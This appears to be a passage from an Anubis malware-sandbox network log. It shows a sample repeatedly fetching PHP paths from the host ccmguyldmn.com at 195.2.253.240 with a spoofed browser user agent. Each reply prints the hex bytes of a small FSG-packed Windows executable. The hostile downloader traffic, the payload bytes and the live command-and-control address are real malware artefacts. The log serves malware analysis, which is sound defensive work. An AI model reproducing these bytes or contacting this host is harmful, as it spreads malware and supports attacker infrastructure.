4279 3a20 5048 502f 352e 322e 390d 0a43    By: PHP/5.2.9..C
6f6e 7465 6e74 2d4c 656e 6774 683a 2037    ontent-Length: 7
3035 0d0a 436f 6e6e 6563 7469 6f6e 3a20    05..Connection: 
636c 6f73 650d 0a43 6f6e 7465 6e74 2d54    close..Content-T
7970 653a 2074 6578 742f 6874 6d6c 0d0a    ype: text/html..
0d0a 4d5a 0000 0000 0000 0000 0000 5045    ..MZ..........PE
0000 4c01 0200 4653 4721 0000 0000 0000    ..L...FSG!......
0000 e000 0f01 0b01 0000 0010 0000 0010    ................
0000 0000 0000 5401 0000 0010 0000 0c00    ......T.........
0000 0000 4000 0010 0000 0002 0000 0400    ....@...........
0000 0000 0000 0400 0000 0000 0000 0050    ...............P
0000 0002 0000 0000 0000 0200 0000 0000    ................
1000 0010 0000 0000 1000 0010 0000 0000    ................
0000 1000 0000 0000 0000 0000 0000 4040    ..............@@
0000 8400 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0030    ...............0
0000 0010 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 e000 00c0 0000    ................
0000 0000 0000 0010 0000 0040 0000 c100    ...........@....
0000 0002 0000 0000 0000 0000 0000 0000    ................
0000 e000 00c0 8725 8440 4000 6194 55a4    .......%.@@.a.U.
b680 ff13 73f9 33c9 ff13 7316 33c0 ff13    ....s.3...s.3...
731f b680 41b0 10ff 1312 c073 fa75 3aaa    s...A......s.u:.
ebe0 ff53 0802 f683 d901 750e ff53 04eb    ...S......u..S..
24ac d1e8 742d 13c9 eb18 9148 c1e0 08ac    $...t-.....H....
ff53 043b 43f8 730a 80fc 0573 0683 f87f    .S.;C.s....s....
7702 4141 958b c5b6 0056 8bf7 2bf0 f3a4    w.AA.....V..+...
5eeb 9f5e ad97 ad50 ff53 1095 8b07 4078    ^..^...P.S....@x
f375 03ff 630c 5055 ff53 14ab ebee 33c9    .u..c.PU.S....3.
41ff 1313 c9ff 1372 f8c3 02d2 7505 8a16    A......r....u...
4612 d2c3 4b45 524e 454c 3332 2e64 6c6c    F...KERNEL32.dll
0000 6ae0 ff70 1538 2040 0733 c0c2 100a    ..j..p.8 @.3....
01ff fd59 392e 0dfc ff03 c334 1146 083a    ...Y9......4.F.:
3ac0 4578 6974 5007 726f 6365 731e 0f4b    :.ExitP.roces..K
a752 4e30 4c33 322e 3864 6cf0 af01 f777    .RN0L32.8dl....w
b000 9840 0000 0000 0000 0000 0000 f201    ...@............
0000 9840 0000 0000 0000 0000 0000 0000    ...@............
0000 0000 0000 0000 0000 0010 4000 0040    ............@..@
4000 0820 4000 0000 0000 8840 4000 8000    @.. @......@@...
0000 007d 0000 6840 4000 e801 4000 dc01    ...}..h@@...@...
4000 de01 4000 0010 4000 a240 0000 b040    @...@...@..@...@
0000 0000 0000 4c6f 6164 4c69 6272 6172    ......LoadLibrar
7941 0000 4765 7450 726f 6341 6464 7265    yA..GetProcAddre
7373 00                                    ss.
from ANUBIS:1035 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 207 - Transferred inbound Bytes: 883
Data sent: 
    
4745 5420 2f70 726f 6773 2f6c 7471 7269    GET /progs/ltqri
766a 2f77 6663 6471 722e 7068 7020 4854    vj/wfcdqr.php HT
5450 2f31 2e31 0d0a 5573 6572 2d41 6765    TP/1.1..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 342e 3020    nt: Mozilla/4.0 
2863 6f6d 7061 7469 626c 653b 204d 5349    (compatible; MSI
4520 372e 303b 2057 696e 646f 7773 204e    E 7.0; Windows N
5420 352e 313b 202e 4e45 5420 434c 5220    T 5.1; .NET CLR 
312e 312e 3433 3232 3b20 2e4e 4554 2043    1.1.4322; .NET C
4c52 2032 2e30 2e35 3037 3237 3b20 2e4e    LR 2.0.50727; .N
4554 2043 4c52 2033 2e30 2e30 3435 3036    ET CLR 3.0.04506
2e33 303b 2049 6e66 6f50 6174 682e 3129    .30; InfoPath.1)
7665 7233 340d 0a48 6f73 743a 2063 636d    ver34..Host: ccm
6775 796c 646d 6e2e 636f 6d0d 0a0d 0a      guyldmn.com....
Data received: 
    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2057 6564 2c20 3031 204a    .Date: Wed, 01 J
756c 2032 3030 3920 3135 3a35 353a 3430    ul 2009 15:55:40
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2846 6564    ache/2.2.11 (Fed
6f72 6129 0d0a 582d 506f 7765 7265 642d    ora)..X-Powered-
4279 3a20 5048 502f 352e 322e 390d 0a43    By: PHP/5.2.9..C
6f6e 7465 6e74 2d4c 656e 6774 683a 2037    ontent-Length: 7
3035 0d0a 436f 6e6e 6563 7469 6f6e 3a20    05..Connection: 
636c 6f73 650d 0a43 6f6e 7465 6e74 2d54    close..Content-T
7970 653a 2074 6578 742f 6874 6d6c 0d0a    ype: text/html..
0d0a 4d5a 0000 0000 0000 0000 0000 5045    ..MZ..........PE
0000 4c01 0200 4653 4721 0000 0000 0000    ..L...FSG!......
0000 e000 0f01 0b01 0000 0010 0000 0010    ................
0000 0000 0000 5401 0000 0010 0000 0c00    ......T.........
0000 0000 4000 0010 0000 0002 0000 0400    ....@...........
0000 0000 0000 0400 0000 0000 0000 0050    ...............P
0000 0002 0000 0000 0000 0200 0000 0000    ................
1000 0010 0000 0000 1000 0010 0000 0000    ................
0000 1000 0000 0000 0000 0000 0000 4040    ..............@@
0000 8400 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0030    ...............0
0000 0010 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 e000 00c0 0000    ................
0000 0000 0000 0010 0000 0040 0000 c100    ...........@....
0000 0002 0000 0000 0000 0000 0000 0000    ................
0000 e000 00c0 8725 8440 4000 6194 55a4    .......%.@@.a.U.
b680 ff13 73f9 33c9 ff13 7316 33c0 ff13    ....s.3...s.3...
731f b680 41b0 10ff 1312 c073 fa75 3aaa    s...A......s.u:.
ebe0 ff53 0802 f683 d901 750e ff53 04eb    ...S......u..S..
24ac d1e8 742d 13c9 eb18 9148 c1e0 08ac    $...t-.....H....
ff53 043b 43f8 730a 80fc 0573 0683 f87f    .S.;C.s....s....
7702 4141 958b c5b6 0056 8bf7 2bf0 f3a4    w.AA.....V..+...
5eeb 9f5e ad97 ad50 ff53 1095 8b07 4078    ^..^...P.S....@x
f375 03ff 630c 5055 ff53 14ab ebee 33c9    .u..c.PU.S....3.
41ff 1313 c9ff 1372 f8c3 02d2 7505 8a16    A......r....u...
4612 d2c3 4b45 524e 454c 3332 2e64 6c6c    F...KERNEL32.dll
0000 6ae0 ff70 1538 2040 0733 c0c2 100a    ..j..p.8 @.3....
01ff fd59 392e 0dfc ff03 c334 1146 083a    ...Y9......4.F.:
3ac0 4578 6974 5007 726f 6365 731e 0f4b    :.ExitP.roces..K
a752 4e30 4c33 322e 3864 6cf0 af01 f777    .RN0L32.8dl....w
b000 9840 0000 0000 0000 0000 0000 f201    ...@............
0000 9840 0000 0000 0000 0000 0000 0000    ...@............
0000 0000 0000 0000 0000 0010 4000 0040    ............@..@
4000 0820 4000 0000 0000 8840 4000 8000    @.. @......@@...
0000 007d 0000 6840 4000 e801 4000 dc01    ...}..h@@...@...
4000 de01 4000 0010 4000 a240 0000 b040    @...@...@..@...@
0000 0000 0000 4c6f 6164 4c69 6272 6172    ......LoadLibrar
7941 0000 4765 7450 726f 6341 6464 7265    yA..GetProcAddre
7373 00                                    ss.
from ANUBIS:1034 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 206 - Transferred inbound Bytes: 883
Data sent: 
    
4745 5420 2f70 726f 6773 2f6c 7471 7269    GET /progs/ltqri
766a 2f66 6364 7a64 2e70 6870 2048 5454    vj/fcdzd.php HTT
502f 312e 310d 0a55 7365 722d 4167 656e    P/1.1..User-Agen
743a 204d 6f7a 696c 6c61 2f34 2e30 2028    t: Mozilla/4.0 (
636f 6d70 6174 6962 6c65 3b20 4d53 4945    compatible; MSIE
2037 2e30 3b20 5769 6e64 6f77 7320 4e54     7.0; Windows NT
2035 2e31 3b20 2e4e 4554 2043 4c52 2031     5.1; .NET CLR 1
2e31 2e34 3332 323b 202e 4e45 5420 434c    .1.4322; .NET CL
5220 322e 302e 3530 3732 373b 202e 4e45    R 2.0.50727; .NE
5420 434c 5220 332e 302e 3034 3530 362e    T CLR 3.0.04506.
3330 3b20 496e 666f 5061 7468 2e31 2976    30; InfoPath.1)v
6572 3334 0d0a 486f 7374 3a20 6363 6d67    er34..Host: ccmg
7579 6c64 6d6e 2e63 6f6d 0d0a 0d0a         uyldmn.com....
Data received: 
    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2057 6564 2c20 3031 204a    .Date: Wed, 01 J
756c 2032 3030 3920 3135 3a35 353a 3430    ul 2009 15:55:40
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2846 6564    ache/2.2.11 (Fed
6f72 6129 0d0a 582d 506f 7765 7265 642d    ora)..X-Powered-
4279 3a20 5048 502f 352e 322e 390d 0a43    By: PHP/5.2.9..C
6f6e 7465 6e74 2d4c 656e 6774 683a 2037    ontent-Length: 7
3035 0d0a 436f 6e6e 6563 7469 6f6e 3a20    05..Connection: 
636c 6f73 650d 0a43 6f6e 7465 6e74 2d54    close..Content-T
7970 653a 2074 6578 742f 6874 6d6c 0d0a    ype: text/html..
0d0a 4d5a 0000 0000 0000 0000 0000 5045    ..MZ..........PE
0000 4c01 0200 4653 4721 0000 0000 0000    ..L...FSG!......
0000 e000 0f01 0b01 0000 0010 0000 0010    ................
0000 0000 0000 5401 0000 0010 0000 0c00    ......T.........
0000 0000 4000 0010 0000 0002 0000 0400    ....@...........
0000 0000 0000 0400 0000 0000 0000 0050    ...............P
0000 0002 0000 0000 0000 0200 0000 0000    ................
1000 0010 0000 0000 1000 0010 0000 0000    ................
0000 1000 0000 0000 0000 0000 0000 4040    ..............@@
0000 8400 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0030    ...............0
0000 0010 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 e000 00c0 0000    ................
0000 0000 0000 0010 0000 0040 0000 c100    ...........@....
0000 0002 0000 0000 0000 0000 0000 0000    ................
0000 e000 00c0 8725 8440 4000 6194 55a4    .......%.@@.a.U.
b680 ff13 73f9 33c9 ff13 7316 33c0 ff13    ....s.3...s.3...
731f b680 41b0 10ff 1312 c073 fa75 3aaa    s...A......s.u:.
ebe0 ff53 0802 f683 d901 750e ff53 04eb    ...S......u..S..
24ac d1e8 742d 13c9 eb18 9148 c1e0 08ac    $...t-.....H....
ff53 043b 43f8 730a 80fc 0573 0683 f87f    .S.;C.s....s....
7702 4141 958b c5b6 0056 8bf7 2bf0 f3a4    w.AA.....V..+...
5eeb 9f5e ad97 ad50 ff53 1095 8b07 4078    ^..^...P.S....@x
f375 03ff 630c 5055 ff53 14ab ebee 33c9    .u..c.PU.S....3.
41ff 1313 c9ff 1372 f8c3 02d2 7505 8a16    A......r....u...
4612 d2c3 4b45 524e 454c 3332 2e64 6c6c    F...KERNEL32.dll
0000 6ae0 ff70 1538 2040 0733 c0c2 100a    ..j..p.8 @.3....
01ff fd59 392e 0dfc ff03 c334 1146 083a    ...Y9......4.F.:
3ac0 4578 6974 5007 726f 6365 731e 0f4b    :.ExitP.roces..K
a752 4e30 4c33 322e 3864 6cf0 af01 f777    .RN0L32.8dl....w
b000 9840 0000 0000 0000 0000 0000 f201    ...@............
0000 9840 0000 0000 0000 0000 0000 0000    ...@............
0000 0000 0000 0000 0000 0010 4000 0040    ............@..@
4000 0820 4000 0000 0000 8840 4000 8000    @.. @......@@...
0000 007d 0000 6840 4000 e801 4000 dc01    ...}..h@@...@...
4000 de01 4000 0010 4000 a240 0000 b040    @...@...@..@...@
0000 0000 0000 4c6f 6164 4c69 6272 6172    ......LoadLibrar
7941 0000 4765 7450 726f 6341 6464 7265    yA..GetProcAddre
7373 00                                    ss.
from ANUBIS:1036 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 210 - Transferred inbound Bytes: 883
Data sent: 
    
4745 5420 2f70 726f 6773 2f6c 7471 7269    GET /progs/ltqri
766a 2f76 6663 6767 756c 796d 2e70 6870    vj/vfcggulym.php
2048 5454 502f 312e 310d 0a55 7365 722d     HTTP/1.1..User-
4167 656e 743a 204d 6f7a 696c 6c61 2f34    Agent: Mozilla/4
2e30 2028 636f 6d70 6174 6962 6c65 3b20    .0 (compatible; 
4d53 4945 2037 2e30 3b20 5769 6e64 6f77    MSIE 7.0; Window
7320 4e54 2035 2e31 3b20 2e4e 4554 2043    s NT 5.1; .NET C
4c52 2031 2e31 2e34 3332 323b 202e 4e45    LR 1.1.4322; .NE
5420 434c 5220 322e 302e 3530 3732 373b    T CLR 2.0.50727;
202e 4e45 5420 434c 5220 332e 302e 3034     .NET CLR 3.0.04
3530 362e 3330 3b20 496e 666f 5061 7468    506.30; InfoPath
2e31 2976 6572 3334 0d0a 486f 7374 3a20    .1)ver34..Host: 
6363 6d67 7579 6c64 6d6e 2e63 6f6d 0d0a    ccmguyldmn.com..
0d0a                                       ..
Data received: 
    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2057 6564 2c20 3031 204a    .Date: Wed, 01 J
756c 2032 3030 3920 3135 3a35 353a 3432    ul 2009 15:55:42
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2846 6564    ache/2.2.11 (Fed
6f72 6129 0d0a 582d 506f 7765 7265 642d    ora)..X-Powered-
4279 3a20 5048 502f 352e 322e 390d 0a43    By: PHP/5.2.9..C
6f6e 7465 6e74 2d4c 656e 6774 683a 2037    ontent-Length: 7
3035 0d0a 436f 6e6e 6563 7469 6f6e 3a20    05..Connection: 
636c 6f73 650d 0a43 6f6e 7465 6e74 2d54    close..Content-T
7970 653a 2074 6578 742f 6874 6d6c 0d0a    ype: text/html..
0d0a 4d5a 0000 0000 0000 0000 0000 5045    ..MZ..........PE
0000 4c01 0200 4653 4721 0000 0000 0000    ..L...FSG!......
0000 e000 0f01 0b01 0000 0010 0000 0010    ................
0000 0000 0000 5401 0000 0010 0000 0c00    ......T.........
0000 0000 4000 0010 0000 0002 0000 0400    ....@...........
0000 0000 0000 0400 0000 0000 0000 0050    ...............P
0000 0002 0000 0000 0000 0200 0000 0000    ................
1000 0010 0000 0000 1000 0010 0000 0000    ................
0000 1000 0000 0000 0000 0000 0000 4040    ..............@@
0000 8400 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0030    ...............0
0000 0010 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 e000 00c0 0000    ................
0000 0000 0000 0010 0000 0040 0000 c100    ...........@....
0000 0002 0000 0000 0000 0000 0000 0000    ................
0000 e000 00c0 8725 8440 4000 6194 55a4    .......%.@@.a.U.
b680 ff13 73f9 33c9 ff13 7316 33c0 ff13    ....s.3...s.3...
731f b680 41b0 10ff 1312 c073 fa75 3aaa    s...A......s.u:.
ebe0 ff53 0802 f683 d901 750e ff53 04eb    ...S......u..S..
24ac d1e8 742d 13c9 eb18 9148 c1e0 08ac    $...t-.....H....
ff53 043b 43f8 730a 80fc 0573 0683 f87f    .S.;C.s....s....
7702 4141 958b c5b6 0056 8bf7 2bf0 f3a4    w.AA.....V..+...
5eeb 9f5e ad97 ad50 ff53 1095 8b07 4078    ^..^...P.S....@x
f375 03ff 630c 5055 ff53 14ab ebee 33c9    .u..c.PU.S....3.
41ff 1313 c9ff 1372 f8c3 02d2 7505 8a16    A......r....u...
4612 d2c3 4b45 524e 454c 3332 2e64 6c6c    F...KERNEL32.dll
0000 6ae0 ff70 1538 2040 0733 c0c2 100a    ..j..p.8 @.3....
01ff fd59 392e 0dfc ff03 c334 1146 083a    ...Y9......4.F.:
3ac0 4578 6974 5007 726f 6365 731e 0f4b    :.ExitP.roces..K
a752 4e30 4c33 322e 3864 6cf0 af01 f777    .RN0L32.8dl....w
b000 9840 0000 0000 0000 0000 0000 f201    ...@............
0000 9840 0000 0000 0000 0000 0000 0000    ...@............
0000 0000 0000 0000 0000 0010 4000 0040    ............@..@
4000 0820 4000 0000 0000 8840 4000 8000    @.. @......@@...
0000 007d 0000 6840 4000 e801 4000 dc01    ...}..h@@...@...
4000 de01 4000 0010 4000 a240 0000 b040    @...@...@..@...@
0000 0000 0000 4c6f 6164 4c69 6272 6172    ......LoadLibrar
7941 0000 4765 7450 726f 6341 6464 7265    yA..GetProcAddre
7373 00                                    ss.
from ANUBIS:1037 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 211 - Transferred inbound Bytes: 883
Data sent: 
    
4745 5420 2f70 726f 6773 2f6c 7471 7269    GET /progs/ltqri
766a 2f66 6976 696a 6e6e 626f 632e 7068    vj/fivijnnboc.ph
7020 4854 5450 2f31 2e31 0d0a 5573 6572    p HTTP/1.1..User
2d41 6765 6e74 3a20 4d6f 7a69 6c6c 612f    -Agent: Mozilla/
342e 3020 2863 6f6d 7061 7469 626c 653b    4.0 (compatible;
204d 5349 4520 372e 303b 2057 696e 646f     MSIE 7.0; Windo
7773 204e 5420 352e 313b 202e 4e45 5420    ws NT 5.1; .NET 
434c 5220 312e 312e 3433 3232 3b20 2e4e    CLR 1.1.4322; .N
4554 2043 4c52 2032 2e30 2e35 3037 3237    ET CLR 2.0.50727
3b20 2e4e 4554 2043 4c52 2033 2e30 2e30    ; .NET CLR 3.0.0
3435 3036 2e33 303b 2049 6e66 6f50 6174    4506.30; InfoPat
682e 3129 7665 7233 340d 0a48 6f73 743a    h.1)ver34..Host:
2063 636d 6775 796c 646d 6e2e 636f 6d0d     ccmguyldmn.com.
0a0d 0a                                    ...
Data received: 
    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2057 6564 2c20 3031 204a    .Date: Wed, 01 J
756c 2032 3030 3920 3135 3a35 353a 3432    ul 2009 15:55:42
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2846 6564    ache/2.2.11 (Fed
6f72 6129 0d0a 582d 506f 7765 7265 642d    ora)..X-Powered-
4279 3a20 5048 502f 352e 322e 390d 0a43    By: PHP/5.2.9..C
6f6e 7465 6e74 2d4c 656e 6774 683a 2037    ontent-Length: 7
3035 0d0a 436f 6e6e 6563 7469 6f6e 3a20    05..Connection: 
636c 6f73 650d 0a43 6f6e 7465 6e74 2d54    close..Content-T
7970 653a 2074 6578 742f 6874 6d6c 0d0a    ype: text/html..
0d0a 4d5a 0000 0000 0000 0000 0000 5045    ..MZ..........PE
0000 4c01 0200 4653 4721 0000 0000 0000    ..L...FSG!......
0000 e000 0f01 0b01 0000 0010 0000 0010    ................
0000 0000 0000 5401 0000 0010 0000 0c00    ......T.........
0000 0000 4000 0010 0000 0002 0000 0400    ....@...........
0000 0000 0000 0400 0000 0000 0000 0050    ...............P
0000 0002 0000 0000 0000 0200 0000 0000    ................
1000 0010 0000 0000 1000 0010 0000 0000    ................
0000 1000 0000 0000 0000 0000 0000 4040    ..............@@
0000 8400 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0030    ...............0
0000 0010 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 e000 00c0 0000    ................
0000 0000 0000 0010 0000 0040 0000 c100    ...........@....
0000 0002 0000 0000 0000 0000 0000 0000    ................
0000 e000 00c0 8725 8440 4000 6194 55a4    .......%.@@.a.U.
b680 ff13 73f9 33c9 ff13 7316 33c0 ff13    ....s.3...s.3...
731f b680 41b0 10ff 1312 c073 fa75 3aaa    s...A......s.u:.
ebe0 ff53 0802 f683 d901 750e ff53 04eb    ...S......u..S..
24ac d1e8 742d 13c9 eb18 9148 c1e0 08ac    $...t-.....H....
ff53 043b 43f8 730a 80fc 0573 0683 f87f    .S.;C.s....s....
7702 4141 958b c5b6 0056 8bf7 2bf0 f3a4    w.AA.....V..+...
5eeb 9f5e ad97 ad50 ff53 1095 8b07 4078    ^..^...P.S....@x
f375 03ff 630c 5055 ff53 14ab ebee 33c9    .u..c.PU.S....3.
41ff 1313 c9ff 1372 f8c3 02d2 7505 8a16    A......r....u...
4612 d2c3 4b45 524e 454c 3332 2e64 6c6c    F...KERNEL32.dll
0000 6ae0 ff70 1538 2040 0733 c0c2 100a    ..j..p.8 @.3....
01ff fd59 392e 0dfc ff03 c334 1146 083a    ...Y9......4.F.:
3ac0 4578 6974 5007 726f 6365 731e 0f4b    :.ExitP.roces..K
a752 4e30 4c33 322e 3864 6cf0 af01 f777    .RN0L32.8dl....w
b000 9840 0000 0000 0000 0000 0000 f201    ...@............
0000 9840 0000 0000 0000 0000 0000 0000    ...@............
0000 0000 0000 0000 0000 0010 4000 0040    ............@..@
4000 0820 4000 0000 0000 8840 4000 8000    @.. @......@@...
0000 007d 0000 6840 4000 e801 4000 dc01    ...}..h@@...@...
4000 de01 4000 0010 4000 a240 0000 b040    @...@...@..@...@
0000 0000 0000 4c6f 6164 4c69 6272 6172    ......LoadLibrar
7941 0000 4765 7450 726f 6341 6464 7265    yA..GetProcAddre
7373 00                                    ss.
from ANUBIS:1038 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 206 - Transferred inbound Bytes: 883
Data sent: 
    
4745 5420 2f70 726f 6773 2f6c 7471 7269    GET /progs/ltqri
766a 2f66 6c76 6a6a 2e70 6870 2048 5454    vj/flvjj.php HTT
502f 312e 310d 0a55 7365 722d 4167 656e    P/1.1..User-Agen
743a 204d 6f7a 696c 6c61 2f34 2e30 2028    t: Mozilla/4.0 (
636f 6d70 6174 6962 6c65 3b20 4d53 4945    compatible; MSIE
2037 2e30 3b20 5769 6e64 6f77 7320 4e54     7.0; Windows NT
2035 2e31 3b20 2e4e 4554 2043 4c52 2031     5.1; .NET CLR 1
2e31 2e34 3332 323b 202e 4e45 5420 434c    .1.4322; .NET CL
5220 322e 302e 3530 3732 373b 202e 4e45    R 2.0.50727; .NE
5420 434c 5220 332e 302e 3034 3530 362e    T CLR 3.0.04506.
3330 3b20 496e 666f 5061 7468 2e31 2976    30; InfoPath.1)v
6572 3334 0d0a 486f 7374 3a20 6363 6d67    er34..Host: ccmg
7579 6c64 6d6e 2e63 6f6d 0d0a 0d0a         uyldmn.com....
Data received: 
    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2057 6564 2c20 3031 204a    .Date: Wed, 01 J
756c 2032 3030 3920 3135 3a35 353a 3438    ul 2009 15:55:48
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2846 6564    ache/2.2.11 (Fed
6f72 6129 0d0a 582d 506f 7765 7265 642d    ora)..X-Powered-
4279 3a20 5048 502f 352e 322e 390d 0a43    By: PHP/5.2.9..C
6f6e 7465 6e74 2d4c 656e 6774 683a 2037    ontent-Length: 7
3035 0d0a 436f 6e6e 6563 7469 6f6e 3a20    05..Connection: 
636c 6f73 650d 0a43 6f6e 7465 6e74 2d54    close..Content-T
7970 653a 2074 6578 742f 6874 6d6c 0d0a    ype: text/html..
0d0a 4d5a 0000 0000 0000 0000 0000 5045    ..MZ..........PE
0000 4c01 0200 4653 4721 0000 0000 0000    ..L...FSG!......
0000 e000 0f01 0b01 0000 0010 0000 0010    ................
0000 0000 0000 5401 0000 0010 0000 0c00    ......T.........
0000 0000 4000 0010 0000 0002 0000 0400    ....@...........
0000 0000 0000 0400 0000 0000 0000 0050    ...............P
0000 0002 0000 0000 0000 0200 0000 0000    ................
1000 0010 0000 0000 1000 0010 0000 0000    ................
0000 1000 0000 0000 0000 0000 0000 4040    ..............@@
0000 8400 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0030    ...............0
0000 0010 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 e000 00c0 0000    ................
0000 0000 0000 0010 0000 0040 0000 c100    ...........@....
0000 0002 0000 0000 0000 0000 0000 0000    ................
0000 e000 00c0 8725 8440 4000 6194 55a4    .......%.@@.a.U.
b680 ff13 73f9 33c9 ff13 7316 33c0 ff13    ....s.3...s.3...
731f b680 41b0 10ff 1312 c073 fa75 3aaa    s...A......s.u:.
ebe0 ff53 0802 f683 d901 750e ff53 04eb    ...S......u..S..
24ac d1e8 742d 13c9 eb18 9148 c1e0 08ac    $...t-.....H....
ff53 043b 43f8 730a 80fc 0573 0683 f87f    .S.;C.s....s....
7702 4141 958b c5b6 0056 8bf7 2bf0 f3a4    w.AA.....V..+...
5eeb 9f5e ad97 ad50 ff53 1095 8b07 4078    ^..^...P.S....@x
f375 03ff 630c 5055 ff53 14ab ebee 33c9    .u..c.PU.S....3.
41ff 1313 c9ff 1372 f8c3 02d2 7505 8a16    A......r....u...
4612 d2c3 4b45 524e 454c 3332 2e64 6c6c    F...KERNEL32.dll
0000 6ae0 ff70 1538 2040 0733 c0c2 100a    ..j..p.8 @.3....
01ff fd59 392e 0dfc ff03 c334 1146 083a    ...Y9......4.F.:
3ac0 4578 6974 5007 726f 6365 731e 0f4b    :.ExitP.roces..K
a752 4e30 4c33 322e 3864 6cf0 af01 f777    .RN0L32.8dl....w
b000 9840 0000 0000 0000 0000 0000 f201    ...@............
0000 9840 0000 0000 0000 0000 0000 0000    ...@............
0000 0000 0000 0000 0000 0010 4000 0040    ............@..@
4000 0820 4000 0000 0000 8840 4000 8000    @.. @......@@...
0000 007d 0000 6840 4000 e801 4000 dc01    ...}..h@@...@...
4000 de01 4000 0010 4000 a240 0000 b040    @...@...@..@...@
0000 0000 0000 4c6f 6164 4c69 6272 6172    ......LoadLibrar
7941 0000 4765 7450 726f 6341 6464 7265    yA..GetProcAddre
7373 00                                    ss.
from ANUBIS:1039 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 204 - Transferred inbound Bytes: 7453
Data sent: 
    
4745 5420 2f70 726f 6773 2f6c 7471 7269    GET /progs/ltqri
766a 2f63 637a 6e72 7273 2048 5454 502f    vj/ccznrrs HTTP/
312e 310d 0a55 7365 722d 4167 656e 743a    1.1..User-Agent:
204d 6f7a 696c 6c61 2f34 2e30 2028 636f     Mozilla/4.0 (co
6d70 6174 6962 6c65 3b20 4d53 4945 2037    mpatible; MSIE 7
2e30 3b20 5769 6e64 6f77 7320 4e54 2035    .0; Windows NT 5
2e31 3b20 2e4e 4554 2043 4c52 2031 2e31    .1; .NET CLR 1.1
2e34 3332 323b 202e 4e45 5420 434c 5220    .4322; .NET CLR 
322e 302e 3530 3732 373b 202e 4e45 5420    2.0.50727; .NET 
434c 5220 332e 302e 3034 3530 362e 3330    CLR 3.0.04506.30
3b20 496e 666f 5061 7468 2e31 2976 6572    ; InfoPath.1)ver
3334 0d0a 486f 7374 3a20 6363 6d67 7579    34..Host: ccmguy
6c64 6d6e 2e63 6f6d 0d0a 0d0a              ldmn.com....
Data received: 
    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2057 6564 2c20 3031 204a    .Date: Wed, 01 J
756c 2032 3030 3920 3135 3a35 353a 3438    ul 2009 15:55:48
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2846 6564    ache/2.2.11 (Fed
